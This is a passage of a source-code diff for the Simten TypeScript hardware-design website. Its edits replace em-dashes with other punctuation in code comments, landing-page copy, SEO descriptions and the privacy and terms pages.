       if (connectionRef.current && reconnectAttemptsRef.current < MAX_RECONNECT_ATTEMPTS) {
-        // We had a valid connection — retry a bounded number of times against the
+        // We had a valid connection, so retry a bounded number of times against the
         // last-known port. Covers a transient drop or an MCP that restarted on the
         // same (preferred) port. Don't loop forever: the port may have moved.
         reconnectAttemptsRef.current += 1;
@@ -214,7 +214,7 @@ export function useMCPConnection(callbacks: MCPCallbacks) {
         }, RETRY_INTERVAL);
       } else {
         // No prior connection, or retries exhausted: drop the stale params so a
-        // returning tab can't keep hammering — or silently mis-attach to — a port
+        // returning tab can't keep hammering (or silently mis-attach to) a port
         // that has moved. The next show_circuit delivers a fresh fragment and
         // reconnects cleanly.
         try {
@@ -229,7 +229,7 @@ export function useMCPConnection(callbacks: MCPCallbacks) {
     };
 
     ws.onerror = () => {
-      // onclose will fire after this — handle reconnection there
+      // onclose will fire after this; handle reconnection there
     };
   }, []);
 
@@ -239,7 +239,7 @@ export function useMCPConnection(callbacks: MCPCallbacks) {
     // Don't auto-discover if we already have a connection
     if (connectionRef.current || wsRef.current) return;
 
-    // Try connecting — if there's no server, this will fail silently
+    // Try connecting; if there's no server, this will fail silently
     // The server will reject us without a token, so this is just a probe
     // For now, auto-discovery only works with fragment params from show_circuit
     // Future: could implement a token-less handshake for discovery
@@ -254,7 +254,7 @@ export function useMCPConnection(callbacks: MCPCallbacks) {
       return;
     }
 
-    // No fragment params — start auto-discovery retry
+    // No fragment params, so start auto-discovery retry
     // For now this is a no-op since we require a token
     // In future, could try well-known port with a discovery protocol
     const discoveryTimer = setInterval(tryAutoDiscover, RETRY_INTERVAL);

--- a/apps/web/src/lib/cc65-compiler.ts
+++ b/apps/web/src/lib/cc65-compiler.ts
@@ -1,5 +1,5 @@
 /**
- * cc65 WASM Compiler — compiles C source to 6502 binary in the browser.
+ * cc65 WASM Compiler: compiles C source to 6502 binary in the browser.
  *
  * Pipeline: cc65 (C → asm) → ca65 (asm → .o) → ld65 (.o → .bin)
  *
@@ -113,7 +113,7 @@ function callMain(mod: EmscriptenModule, args: string[], stderr: string[]): numb
   try {
     return mod.callMain(args);
   } catch (e: unknown) {
-    // Emscripten throws on exit() — extract status code if available
+    // Emscripten throws on exit(); extract status code if available
     if (e && typeof e === 'object' && 'status' in e) {
       return (e as { status: number }).status;
     }

--- a/apps/web/src/lib/extract-circuit-name.ts
+++ b/apps/web/src/lib/extract-circuit-name.ts
@@ -2,7 +2,7 @@
  * Best-effort extraction of the first `circuit('Name', ...)` in a source
  * string, for SSR `<title>` / og:title.
  *
- * Brittle on template literals, escaped quotes and multi-line declarations —
+ * Brittle on template literals, escaped quotes and multi-line declarations,
  * that is intentional, and callers MUST have a generic fallback for the misses.
  * The scan itself lives in `@simten/core/circuit` so the editor, the game and
  * this share the one implementation.

--- a/apps/web/src/lib/port-values.ts
+++ b/apps/web/src/lib/port-values.ts
@@ -4,7 +4,7 @@
  * Shared between TruthTable's row-highlight logic (which only ever
  * reads input bits) and the docs/CustomCompositionDemo (which reads
  * both inputs and outputs). Lives here so the candidate-key list stays
- * a single source of truth — historically the two consumers had
+ * a single source of truth; historically the two consumers had
  * separate copies that drifted (the truth-table version was missing
  * the output-side candidates, which broke when anyone tried to read
  * outputs through it).

--- a/apps/web/src/lib/seo.ts
+++ b/apps/web/src/lib/seo.ts
@@ -6,7 +6,7 @@ type Meta = { title?: string } & Record<string, string>;
 export type PageSeo = {
   /** Page title (will be suffixed with " | Simten" unless `titleExact` is true). */
   title: string;
-  /** Set true to use `title` verbatim — e.g. for the landing page. */
+  /** Set true to use `title` verbatim, e.g. for the landing page. */
   titleExact?: boolean;
   /** Meta description for search results + social cards. */
   description: string;
@@ -14,7 +14,7 @@ export type PageSeo = {
   path: string;
   /** Override the default OG image. Site-relative path or absolute URL. */
   image?: string;
-  /** og:type — "website" for landing/index pages, "article" for blog posts. */
+  /** og:type: "website" for landing/index pages, "article" for blog posts. */
   type?: 'website' | 'article';
 };
 
@@ -100,7 +100,7 @@ export function blogPostingLd(args: {
 }
 
 /**
- * Full head config for a blog post — meta tags, canonical, BlogPosting + BreadcrumbList JSON-LD.
+ * Full head config for a blog post: meta tags, canonical, BlogPosting + BreadcrumbList JSON-LD.
  * Pass the post entry from the blog manifest; everything else is derived.
  */
 export function blogPostHead(post: { slug: string; title: string; description: string }) {

--- a/apps/web/src/routes/__root.tsx
+++ b/apps/web/src/routes/__root.tsx
@@ -16,7 +16,7 @@ const shareCircuitFn = (source: string) => shareCircuit({ data: { source } });
 
 // Tool routes render their own SiteHeader with custom right-slot content
 // (the editor and the RV32I debugger pass tool controls instead of nav
-// links). They also have no SiteFooter — tool pages stay focused. Routes
+// links). They also have no SiteFooter; tool pages stay focused. Routes
 // opt out by setting `staticData: { skipDefaultChrome: true }`. We avoid a
 // central route-ID list here because the literal $-placeholder strings
 // (`/circuit_/$encoded`, etc.) would ship in the minified bundle and
@@ -61,9 +61,9 @@ export const Route = createRootRoute({
       { rel: 'icon', href: '/favicon.svg', type: 'image/svg+xml' },
       { rel: 'apple-touch-icon', href: '/icon-192.png' },
       { rel: 'manifest', href: '/manifest.json' },
-      // Note: rel="canonical" is set per-route via pageHead() in lib/seo.ts —
+      // Note: rel="canonical" is set per-route via pageHead() in lib/seo.ts,
       // not here. Two canonical tags would force Google to pick one at random.
-      // Geist + Geist Mono are self-hosted — see /public/fonts and the
+      // Geist + Geist Mono are self-hosted; see /public/fonts and the
       // @font-face rules in styles.css. Preload both so they're fetched in
       // parallel with the HTML rather than discovered after CSS parses.
       {

--- a/apps/web/src/routes/api/search.ts
+++ b/apps/web/src/routes/api/search.ts
@@ -4,7 +4,7 @@ import { blogSource, source } from '@/lib/source';
 
 // Unified index across both collections. Each page is tagged 'docs' or 'blog'
 // so the client can scope results (?tag=…) while a single search still spans
-// everything — a reader on a blog post can find the relevant doc and vice versa.
+// everything: a reader on a blog post can find the relevant doc and vice versa.
 const server = createSearchAPI('advanced', {
   language: 'english',
   indexes: [...source.getPages(), ...blogSource.getPages()].map((page) => ({

--- a/apps/web/src/routes/blog/$.tsx
+++ b/apps/web/src/routes/blog/$.tsx
@@ -15,7 +15,7 @@ import { blogSource } from '@/lib/source';
 export const Route = createFileRoute('/blog/$')({
   component: Page,
   // SEO comes from the posts manifest (the same source the blog index uses),
-  // keyed by slug — not from loaderData, which TanStack can't type through the
+  // keyed by slug, not from loaderData, which TanStack can't type through the
   // async server fn here. Unregistered slugs (e.g. placeholders) get a generic
   // head rather than throwing.
   head: ({ params }) => {

--- a/apps/web/src/routes/circuit.tsx
+++ b/apps/web/src/routes/circuit.tsx
@@ -6,10 +6,10 @@ import { pageHead } from '@/lib/seo';
 export const Route = createFileRoute('/circuit')({
   staticData: { skipDefaultChrome: true },
   // ?example=<id> opens a bundled picker example (e.g. /circuit?example=snake).
-  // Unlike a share link, the content always matches the deploy — used by the
+  // Unlike a share link, the content always matches the deploy; used by the
   // landing page CTAs. Loads via initialSource (ephemeral mode), so it never
   // overwrites the visitor's own saved editor work. Unknown ids fall through
-  // to the normal editor. Example ids are public URL surface — keep them stable.
+  // to the normal editor. Example ids are public URL surface; keep them stable.
   validateSearch: (search: Record<string, unknown>): { example?: string } => ({
     example: typeof search.example === 'string' ? search.example : undefined,
   }),
@@ -17,7 +17,7 @@ export const Route = createFileRoute('/circuit')({
     pageHead({
       title: 'Editor',
       description:
-        'Build, simulate, and debug digital circuits live in your browser. From single gates to multi-cycle pipelines — all in TypeScript.',
+        'Build, simulate, and debug digital circuits live in your browser. From single gates to multi-cycle pipelines, all in TypeScript.',
       path: '/circuit',
     }),
   component: CircuitPage,

--- a/apps/web/src/routes/circuit_.$encoded.tsx
+++ b/apps/web/src/routes/circuit_.$encoded.tsx
@@ -10,7 +10,7 @@ export const Route = createFileRoute('/circuit_/$encoded')({
     // Defense against crawlers that find the raw route-ID string
     // (`/circuit_/$encoded`) in JS bundles or the TanStack manifest and try
     // to fetch it literally. A real share URL never has a $-prefixed
-    // encoded value — those are TanStack route-ID placeholders, not user
+    // encoded value; those are TanStack route-ID placeholders, not user
     // input. Return 410 Gone + noindex so Google drops the URL fast.
     if (params.encoded.startsWith('$')) {
       throw new Response(null, {
@@ -38,7 +38,7 @@ export const Route = createFileRoute('/circuit_/$encoded')({
 });
 
 function SharedCircuitRoute() {
-  // Decode from params directly — don't rely on loader-data hydration, which
+  // Decode from params directly; don't rely on loader-data hydration, which
   // can drop on the client and leave the editor showing DEFAULT_CODE. The
   // loader still runs server-side for SSR meta tags via the head() function.
   const { encoded } = Route.useParams();

--- a/apps/web/src/routes/circuit_.s.$hash.tsx
+++ b/apps/web/src/routes/circuit_.s.$hash.tsx
@@ -7,7 +7,7 @@ import { pageHead } from '@/lib/seo';
 export const Route = createFileRoute('/circuit_/s/$hash')({
   staticData: { skipDefaultChrome: true },
   loader: async ({ params }) => {
-    // See circuit_.$encoded.tsx — same defense against crawled route-ID
+    // See circuit_.$encoded.tsx for the same defense against crawled route-ID
     // placeholder strings ($hash etc.). Real share hashes never start with $.
     if (params.hash.startsWith('$')) {
       throw new Response(null, {

--- a/apps/web/src/routes/cpu/index.tsx
+++ b/apps/web/src/routes/cpu/index.tsx
@@ -37,8 +37,8 @@ function CPUIndexPage() {
                   RV32I
                 </h2>
                 <p className="mt-2 text-gray-400 leading-relaxed">
-                  Write C, C++, Rust, or assembly — compile it and watch it execute instruction by
-                  instruction on a real 5-stage pipelined RISC-V CPU. See every pipeline stage,
+                  Write C, C++, Rust, or assembly, then compile it and watch it execute instruction
+                  by instruction on a real 5-stage pipelined RISC-V CPU. See every pipeline stage,
                   register, and clock cycle.
                 </p>
               </div>

--- a/apps/web/src/routes/index.tsx
+++ b/apps/web/src/routes/index.tsx
@@ -69,7 +69,7 @@ export const Route = createFileRoute('/')({
       title: 'Simten | Hardware design in TypeScript',
       titleExact: true,
       description:
-        'A TypeScript HDL where npm is your testbench — from logic gates to a RISC-V CPU. Test circuits against real firmware, then synthesize to Verilog.',
+        'A TypeScript HDL where npm is your testbench, from logic gates to a RISC-V CPU. Test circuits against real firmware, then synthesize to Verilog.',
       path: '/',
     }),
     scripts: [softwareApplicationLd()],
@@ -93,7 +93,7 @@ function Splash5Page() {
 // ----------------------------------------------------------------------------
 // 3×2 grid of "what does this thing do" cells, slotted between the hero and
 // the heavy demo gallery. Modeled on Vercel/Linear/Anthropic landing bento
-// grids — each cell is title + one-line description + subtle arrow link +
+// grids: each cell is title + one-line description + subtle arrow link +
 // a visual area at the bottom. Visuals are placeholder boxes for now; the
 // plan is to drop in real little mockups (stripped CircuitEmbed, waveform
 // timeline, terminal snippet, code snippet, etc.) cell-by-cell once the
@@ -106,19 +106,19 @@ function BentoFeatures() {
         <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-px bg-border rounded-lg overflow-hidden border border-border">
           <BentoCell
             title="Type-safe end to end"
-            description="Circuits are TypeScript. Runs natively in Node, Bun, or browser — no testbench language, no codegen step."
+            description="Circuits are TypeScript. Runs natively in Node, Bun, or browser: no testbench language, no codegen step."
             visual={<TypesafeBentoVisual />}
             href="/docs/component-model"
           />
           <BentoCell
             title="Bring any npm package"
-            description="fast-check for property testing, D3 for visualization, the GCC RISC-V toolchain — your circuit code is just code."
+            description="fast-check for property testing, D3 for visualization, the GCC RISC-V toolchain. Your circuit code is just code."
             visual={<NpmBentoVisual />}
             href="/docs/examples"
           />
           <BentoCell
             title="Drop-in embeds"
-            description="One component renders a fully interactive circuit anywhere — blogs, docs, MDX. Same engine as the editor."
+            description="One component renders a fully interactive circuit anywhere: blogs, docs, MDX. Same engine as the editor."
             visual={<EmbedsBentoVisual />}
             href="/docs/building-custom-uis"
           />
@@ -130,7 +130,7 @@ function BentoFeatures() {
           />
           <BentoCell
             title="Wire it to your assistant"
-            description="An MCP server lets Claude, Codex, Gemini, or Cursor write, simulate, and debug circuits live in your browser — describe, generate, fix, ship."
+            description="An MCP server lets Claude, Codex, Gemini, or Cursor write, simulate, and debug circuits live in your browser: describe, generate, fix, ship."
             visual={<MCPBentoVisual />}
             href="/docs/mcp-integration"
           />
@@ -205,7 +205,7 @@ function BentoCell({
   );
 }
 
-// "Type-safe end to end" — small IDE-style card with the HalfAdder source.
+// "Type-safe end to end": small IDE-style card with the HalfAdder source.
 // Card is wider than the cell and anchored bottom-left, so the right edge
 // and top get cropped by the cell's overflow-hidden, giving the
 // "you're peeking at a real editor" look from Cursor's bento. Identifiers
@@ -242,22 +242,22 @@ const FullAdder = circuit('FullAdder', {
   ],
 });
 
-// Same engine in Node — no codegen, no testbench.
+// Same engine in Node: no codegen, no testbench.
 const sim = simulate(FullAdder);
 sim.set({ a: 1, b: 1, cin: 1 });
 console.log(sim.get('sum'), sim.get('cout')); // 1, 1`;
 
-// "Bring any npm package" — same IDE card chrome as the type-safe cell, but
+// "Bring any npm package": same IDE card chrome as the type-safe cell, but
 // the file content swaps every ~3.5s through a handful of real npm-package
 // snippets (figlet, fast-check, d3-force, GCC). All snippets render stacked
-// with opacity transitions so the crossfade is smooth — only the active one
+// with opacity transitions so the crossfade is smooth; only the active one
 // is interactive (pointer-events-none on the rest). CodeWithHovers powers
 // each snippet so the simten-API identifiers (ROM, simulate, etc.) light up
 // the hover popups; non-API names (fc, figlet, forceSimulation) stay inert.
 const NPM_SNIPPETS: { filename: string; code: string }[] = [
   {
     filename: 'logo-rom.ts',
-    code: `// figlet — ASCII art baked into a hardware ROM
+    code: `// figlet: ASCII art baked into a hardware ROM
 import figlet from 'figlet';
 import smallFont from 'figlet/fonts/Small';
 import { ROM, romFromBytes } from '@simten/core/std';
@@ -270,7 +270,7 @@ const Logo = ROM({ memory: romFromBytes(bytes) });`,
   },
   {
     filename: 'adder.test.ts',
-    code: `// fast-check — property-test the half adder
+    code: `// fast-check: property-test the half adder
 import * as fc from 'fast-check';
 import { simulate } from '@simten/core/sim';
 
@@ -284,7 +284,7 @@ fc.assert(
   },
   {
     filename: 'layout.ts',
-    code: `// d3-force — auto-layout the circuit graph
+    code: `// d3-force: auto-layout the circuit graph
 import { forceSimulation, forceLink, forceManyBody } from 'd3-force';
 
 const layout = forceSimulation(nodes)
@@ -297,7 +297,7 @@ for (const n of layout.nodes()) editor.move(n.id, n.x, n.y);`,
   },
   {
     filename: 'boot.ts',
-    code: `// GCC — compile Rust to RISC-V bytes, drop into ROM
+    code: `// GCC: compile Rust to RISC-V bytes, drop into ROM
 import { execSync } from 'child_process';
 import { ROM, romFromBytes } from '@simten/core/std';
 
@@ -322,8 +322,8 @@ function NpmBentoVisual() {
   return (
     <div className="absolute inset-0 flex items-start p-4">
       <div className="relative w-[540px] flex-shrink-0 rounded-md border border-border bg-card shadow-md -mr-8">
-        {/* Tab bar — filename swaps with the snippet. Single mount, content
-            switches in place (no opacity tricks needed — the swap is fast
+        {/* Tab bar: filename swaps with the snippet. Single mount, content
+            switches in place (no opacity tricks needed; the swap is fast
             enough that the bar just feels like a tab change). */}
         <div className="flex items-center h-7 px-3 border-b border-border bg-muted/60 gap-2">
           <div className="flex gap-1 shrink-0">
@@ -336,7 +336,7 @@ function NpmBentoVisual() {
           </span>
         </div>
 
-        {/* Stacked snippets — all rendered, only the active one is visible
+        {/* Stacked snippets: all rendered, only the active one is visible
             and interactive. Min-height locks the card so the layout doesn't
             jump as snippets of different lengths cycle through. */}
         <div className="relative" style={{ minHeight: 200 }}>
@@ -361,13 +361,13 @@ function NpmBentoVisual() {
   );
 }
 
-// "Drop-in embeds" — static IDE card showing the import + the JSX usage.
+// "Drop-in embeds": static IDE card showing the import + the JSX usage.
 // Mirrors the snippet in the embed CTA section further down the page so
 // the reader sees the same shape in both places.
 const EMBED_SNIPPET = `import { CircuitEmbed } from '@simten/embed';
 import { HalfAdder } from './half-adder';
 
-// Live, interactive hardware — three lines.
+// Live, interactive hardware in three lines.
 export default function Post() {
   return (
     <article>
@@ -398,7 +398,7 @@ function EmbedsBentoVisual() {
   );
 }
 
-// "Composable to the gate" — nested cards illustrating drilldown. The
+// "Composable to the gate": nested cards illustrating drilldown. The
 // outermost is a FullAdder; you "open it" to see a HalfAdder inside; open
 // THAT to see an Xor; open Xor to see the underlying Nand gate. Each
 // layer carries the same pulsing inspect badge used on real composite
@@ -476,7 +476,7 @@ function DrilldownLayer({
   );
 }
 
-// "Wire it to Claude" — dark terminal card snapshotting the MCP install +
+// "Wire it to Claude": dark terminal card snapshotting the MCP install +
 // a tiny scripted Claude exchange (one prompt, two tool calls, a result).
 // Intentionally dark so it stands out against the light cell background;
 // mirrors the hero's TerminalWindow palette so the page reads as one
@@ -528,7 +528,7 @@ function MCPBentoVisual() {
   );
 }
 
-// "Rewind any cycle" — mini waveform viewer with a scrubbing playhead.
+// "Rewind any cycle": mini waveform viewer with a scrubbing playhead.
 // Four signals (clk, count[0], count[1], q) drawn as SVG polylines over
 // 16 cycles. The playhead is an absolute vertical line that slides with
 // the cycle state, and the cycle counter above updates in sync.
@@ -641,7 +641,7 @@ function TimeTravelBentoVisual() {
             </div>
           ))}
 
-          {/* Playhead — absolutely positioned relative to this container.
+          {/* Playhead, absolutely positioned relative to this container.
               `left` is computed: container padding + label width + gap +
               cycle offset. Animates with `transition: left`. */}
           <div
@@ -685,7 +685,7 @@ function ScrubberBtn({ children }: { children: ReactNode }) {
 function TypesafeBentoVisual() {
   return (
     <div className="absolute inset-0 flex items-start p-4">
-      {/* Inner "editor" card — fixed width wider than the cell and anchored
+      {/* Inner "editor" card, fixed width wider than the cell and anchored
           top-left, with a negative right margin to extend further past the
           right edge. The snippet is long enough that the bottom of the
           card spills past the cell floor too, so both edges visibly clip
@@ -719,7 +719,7 @@ function MobileAIHero() {
         Describe hardware. Claude builds it. Test it like software.
       </h1>
       <p className="mt-4 text-sm text-muted-foreground">
-        A TypeScript HDL where the whole npm ecosystem is your testbench — drive a circuit with real
+        A TypeScript HDL where the whole npm ecosystem is your testbench. Drive a circuit with real
         firmware, any library you can <code>npm install</code>, and watch it run cycle-by-cycle.
         Synthesizable to Verilog.
       </p>
@@ -748,7 +748,7 @@ function DemoGallery() {
   return (
     <div className="relative pb-16 md:pb-24 md:animate-in md:fade-in md:duration-700 overflow-hidden">
       <Container className="relative">
-        {/* Lead with the heavy proof — the RV32I CPU — to show the
+        {/* Lead with the heavy proof, the RV32I CPU, to show the
             framework's range up front. Lighter playable demos follow.
             First Section overrides the default top margin since the
             DemoGallery wrapper already provides top padding. */}
@@ -758,7 +758,7 @@ function DemoGallery() {
               Scale to real-world complexity
             </h2>
             <p className="mt-4 text-base lg:text-lg text-muted-foreground">
-              The framework already runs heavy systems in the browser — for example, a 5-stage
+              The framework already runs heavy systems in the browser: for example, a 5-stage
               pipelined RISC-V CPU executing GCC-compiled C, C++, and Rust.
             </p>
             <Link
@@ -775,7 +775,7 @@ function DemoGallery() {
               <RV32IDebuggerPreview />
             </div>
 
-            {/* Conformance receipt. Honest framing per the harness README —
+            {/* Conformance receipt. Honest framing per the harness README:
                 simulation vs Spike, not silicon certification. */}
             <a
               href="https://github.com/simtenHQ/simten/blob/main/hardware/ulx3s/projects/cpu/archtest/README.md"
@@ -804,7 +804,7 @@ function DemoGallery() {
           </div>
         </Section>
 
-        {/* And the lighter side — same engine, more fun. Wrapped in
+        {/* And the lighter side: same engine, more fun. Wrapped in
             Section so it picks up the standard inter-section margin
             (mt-28 md:mt-36) below the Scale block. */}
         <Section>
@@ -818,14 +818,14 @@ function DemoGallery() {
             </p>
           </div>
 
-          {/* Featured games — Pong on the left, Snake on the right */}
+          {/* Featured games: Pong on the left, Snake on the right */}
           <div className="grid grid-cols-1 sm:grid-cols-2 gap-4 mb-4">
             <PongCard />
             <SnakeCard />
           </div>
         </Section>
 
-        {/* Row 1.5: removed — drilldown showcase relocated below for tightness */}
+        {/* Row 1.5: removed, drilldown showcase relocated below for tightness */}
         <div className="hidden">
           {/* placeholder kept so the diff stays small */}
           <div className="mt-32 rounded-lg border border-border overflow-hidden bg-card">
@@ -871,7 +871,7 @@ function DemoGallery() {
                       </svg>
                     </span>
                   </span>{' '}
-                  badge to open its internals — with full simulation and nested drill-down.
+                  badge to open its internals, with full simulation and nested drill-down.
                 </p>
                 <div className="space-y-2 text-[12px] text-muted-foreground">
                   <div className="flex items-start gap-2">
@@ -890,7 +890,7 @@ function DemoGallery() {
                   </div>
                   <div className="flex items-start gap-2">
                     <span className="text-blue-400 mt-0.5">3.</span>
-                    <span>Toggle switches — signals propagate through every level</span>
+                    <span>Toggle switches: signals propagate through every level</span>
                   </div>
                 </div>
               </div>
@@ -956,7 +956,7 @@ function DemoGallery() {
                 </h3>
                 <p className="text-[15px] text-foreground/75 leading-snug mb-5">
                   Sequential circuits record every state. Step forward, spot something wrong, step
-                  back to the exact cycle it happened. No printf debugging — just rewind.
+                  back to the exact cycle it happened. No printf debugging, just rewind.
                 </p>
                 <div className="space-y-2 text-[12px] text-muted-foreground/80">
                   <div className="flex items-start gap-2">
@@ -973,7 +973,7 @@ function DemoGallery() {
                   <div className="flex items-start gap-2">
                     <span className="text-amber-600 dark:text-amber-400 mt-0.5">3.</span>
                     <span>
-                      Use <strong className="text-foreground">◀ ▶</strong> to scrub back and forth —
+                      Use <strong className="text-foreground">◀ ▶</strong> to scrub back and forth;
                       every cycle is preserved
                     </span>
                   </div>
@@ -986,7 +986,7 @@ function DemoGallery() {
       </Container>
 
       <Container className="relative">
-        {/* Verilog Export — honest framing */}
+        {/* Verilog Export, honest framing */}
         <Section>
           <div className="max-w-2xl mb-10 lg:mb-12">
             <h2 className="text-3xl sm:text-4xl font-semibold tracking-tight leading-[1.1]">
@@ -1224,7 +1224,7 @@ function SnakeCard() {
 
   return (
     <div className="flex flex-col rounded-lg border border-border overflow-hidden bg-card">
-      {/* Preview — square so the grid fills the card at any width */}
+      {/* Preview: square so the grid fills the card at any width */}
       <div className="h-[320px] sm:h-[360px] flex items-center justify-center bg-black p-4 sm:p-6">
         {sim.ready ? (
           <svg
@@ -1250,7 +1250,7 @@ function SnakeCard() {
         )}
       </div>
 
-      {/* Info strip — matches CircuitEmbed */}
+      {/* Info strip, matches CircuitEmbed */}
       <div className="border-t border-border px-4 py-3 flex items-end justify-between gap-4">
         <div>
           <div className="text-[13px] font-semibold text-foreground">Snake</div>

--- a/apps/web/src/routes/learn/adders.tsx
+++ b/apps/web/src/routes/learn/adders.tsx
@@ -101,7 +101,7 @@ export const Route = createFileRoute('/learn/adders')({
     ...pageHead({
       title: 'How adders work (and why ripple-carry is slow)',
       description:
-        'Adders are how digital circuits do addition. The naive design — chaining single-bit adders together — has a problem that gets worse as inputs widen. This is a concept-level walkthrough of why, with live editable circuits.',
+        'Adders are how digital circuits do addition. The naive design (chaining single-bit adders together) has a problem that gets worse as inputs widen. This is a concept-level walkthrough of why, with live editable circuits.',
       path: '/learn/adders',
     }),
     scripts: [

--- a/apps/web/src/routes/learn/index.tsx
+++ b/apps/web/src/routes/learn/index.tsx
@@ -37,8 +37,8 @@ function LearnIndexPage() {
                   Adders
                 </h2>
                 <p className="mt-2 text-gray-400 leading-relaxed">
-                  How digital circuits add two numbers &mdash; starting from a single XOR gate,
-                  ending with why the obvious design gets slower the wider your inputs are.
+                  How digital circuits add two numbers, starting from a single XOR gate, ending with
+                  why the obvious design gets slower the wider your inputs are.
                 </p>
               </div>
               <span className="text-gray-600 group-hover:text-blue-400 transition-colors text-2xl ml-4">
@@ -62,8 +62,8 @@ function LearnIndexPage() {
                   Abstraction
                 </h2>
                 <p className="mt-2 text-gray-400 leading-relaxed">
-                  How a cluster of gates becomes a named block you can reuse &mdash; and how the
-                  same move scales from a half-adder up to a CPU.
+                  How a cluster of gates becomes a named block you can reuse, and how the same move
+                  scales from a half-adder up to a CPU.
                 </p>
               </div>
               <span className="text-gray-600 group-hover:text-blue-400 transition-colors text-2xl ml-4">
@@ -88,8 +88,7 @@ function LearnIndexPage() {
                 </h2>
                 <p className="mt-2 text-gray-400 leading-relaxed">
                   How a circuit remembers. From the single-bit D flip-flop to multi-bit registers
-                  with write-enable, ending with a counter &mdash; the first useful sequential
-                  circuit.
+                  with write-enable, ending with a counter, the first useful sequential circuit.
                 </p>
               </div>
               <span className="text-gray-600 group-hover:text-blue-400 transition-colors text-2xl ml-4">
@@ -103,7 +102,7 @@ function LearnIndexPage() {
             </div>
           </Link>
 
-          <p className="text-gray-500 pt-4">More coming &mdash; FSMs, multiplexers.</p>
+          <p className="text-gray-500 pt-4">More coming: FSMs, multiplexers.</p>
         </div>
 
         <footer className="mt-16 pt-8 border-t border-gray-800 text-center">

--- a/apps/web/src/routes/learn/registers.tsx
+++ b/apps/web/src/routes/learn/registers.tsx
@@ -75,7 +75,7 @@ export const Route = createFileRoute('/learn/registers')({
     ...pageHead({
       title: 'How registers work',
       description:
-        'How circuits remember. From the single-bit D flip-flop to multi-bit registers with write-enable, ending with a counter — the first useful sequential circuit.',
+        'How circuits remember. From the single-bit D flip-flop to multi-bit registers with write-enable, ending with a counter, the first useful sequential circuit.',
       path: '/learn/registers',
     }),
     scripts: [

--- a/apps/web/src/routes/privacy.tsx
+++ b/apps/web/src/routes/privacy.tsx
@@ -52,9 +52,9 @@ function PrivacyPage() {
           shared circuit, we increment two counters in Cloudflare&apos;s first-party analytics
           product: <code>share_create</code> (with the hash and source byte length) and{' '}
           <code>share_read</code> (with the hash). No IP, no user agent, no personal data is logged
-          here — we use it to size capacity and spot abuse patterns. There is no tracker on any
-          page, no Google Analytics, no PostHog, no Sentry, no Plausible. We considered them and
-          chose not to ship them.
+          here; we use it to size capacity and spot abuse patterns. There is no tracker on any page,
+          no Google Analytics, no PostHog, no Sentry, no Plausible. We considered them and chose not
+          to ship them.
         </p>
         <p>
           <strong>Shared circuit source (Cloudflare KV).</strong> If you press the
@@ -72,13 +72,13 @@ function PrivacyPage() {
             No third-party analytics, tracking pixels, advertising scripts, or session replay.
           </li>
           <li>
-            No telemetry from the MCP server (<code>@simten/mcp</code>) — it runs entirely on your
+            No telemetry from the MCP server (<code>@simten/mcp</code>); it runs entirely on your
             machine and does not phone home.
           </li>
           <li>
             No telemetry from the embed library (<code>@simten/embed</code> /{' '}
-            <code>&lt;CircuitEmbed /&gt;</code>) — it does not call back to simten.dev when loaded
-            on third-party sites.
+            <code>&lt;CircuitEmbed /&gt;</code>); it does not call back to simten.dev when loaded on
+            third-party sites.
           </li>
           <li>
             No telemetry from the FPGA pipeline (<code>apps/synth</code>, <code>apps/verifier</code>
@@ -93,15 +93,15 @@ function PrivacyPage() {
         </p>
         <ul>
           <li>
-            <code>theme</code> — light/dark preference.
+            <code>theme</code>: light/dark preference.
           </li>
           <li>
-            <code>simten:mcp-connection</code> — the connection token + port for reconnecting to
-            your local MCP server. Local-only; never leaves your machine.
+            <code>simten:mcp-connection</code>: the connection token + port for reconnecting to your
+            local MCP server. Local-only; never leaves your machine.
           </li>
           <li>
-            <code>simten-ts-code</code> (and similar editor keys) — your current editor buffer, so
-            it survives page reload.
+            <code>simten-ts-code</code> (and similar editor keys): your current editor buffer, so it
+            survives page reload.
           </li>
         </ul>
         <p>No cookies of any kind.</p>
@@ -109,7 +109,7 @@ function PrivacyPage() {
         <H2>Third parties that may see your IP</H2>
         <ul>
           <li>
-            <strong>Cloudflare</strong> — hosts simten.dev and serves every request. See{' '}
+            <strong>Cloudflare</strong>: hosts simten.dev and serves every request. See{' '}
             <ExternalLink href="https://www.cloudflare.com/privacypolicy/">
               Cloudflare&apos;s privacy policy
             </ExternalLink>
@@ -119,15 +119,15 @@ function PrivacyPage() {
             <strong>
               jsDelivr (<code>cdn.jsdelivr.net</code>)
             </strong>{' '}
-            — the editor loads the TypeScript compiler from jsDelivr for in-browser type checking.
-            Loaded only when you open the editor. See{' '}
+            loads the TypeScript compiler from jsDelivr for in-browser type checking. Loaded only
+            when you open the editor. See{' '}
             <ExternalLink href="https://www.jsdelivr.com/privacy-policy-jsdelivr-net">
               jsDelivr&apos;s privacy policy
             </ExternalLink>
             .
           </li>
           <li>
-            <strong>esm.sh</strong> — the in-browser sandbox loads any npm packages your circuit
+            <strong>esm.sh</strong>: the in-browser sandbox loads any npm packages your circuit
             imports from esm.sh. Loaded only if your circuit has <code>import</code> statements. See{' '}
             <ExternalLink href="https://esm.sh">esm.sh</ExternalLink>.
           </li>
@@ -170,7 +170,7 @@ function PrivacyPage() {
         <H2>Your rights (GDPR / CCPA)</H2>
         <p>
           Because we collect no personal identifiers tied to you, most data-subject requests
-          don&apos;t apply meaningfully. The exception is shared circuits — if you shared a circuit
+          don&apos;t apply meaningfully. The exception is shared circuits: if you shared a circuit
           and want it deleted, email{' '}
           <a
             href="mailto:privacy@simten.dev"

--- a/apps/web/src/routes/terms.tsx
+++ b/apps/web/src/routes/terms.tsx
@@ -79,7 +79,7 @@ function TermsPage() {
           long as the link remains active. You retain all other rights.
         </p>
         <p>
-          We may remove shared content at our discretion — for example, if it&apos;s reported as
+          We may remove shared content at our discretion, for example if it&apos;s reported as
           illegal or abusive, or if it appears to be used to circumvent acceptable-use rules. Email{' '}
           <a
             href="mailto:security@simten.dev"
@@ -108,7 +108,7 @@ function TermsPage() {
           <strong>
             &ldquo;as is&rdquo; and &ldquo;as available,&rdquo; without warranty of any kind
           </strong>
-          , express or implied — including without limitation any warranty of merchantability,
+          , express or implied, including without limitation any warranty of merchantability,
           fitness for a particular purpose, accuracy, non-infringement, or availability.
         </p>
         <p>In particular, and without limiting the generality of the above:</p>
@@ -135,14 +135,14 @@ function TermsPage() {
         <H2>7. Limitation of liability</H2>
         <p>
           To the maximum extent permitted by law, Simten and its contributors shall not be liable
-          for any indirect, incidental, special, consequential, exemplary, or punitive damages —
-          including loss of profits, data, use, goodwill, or other intangible losses — arising out
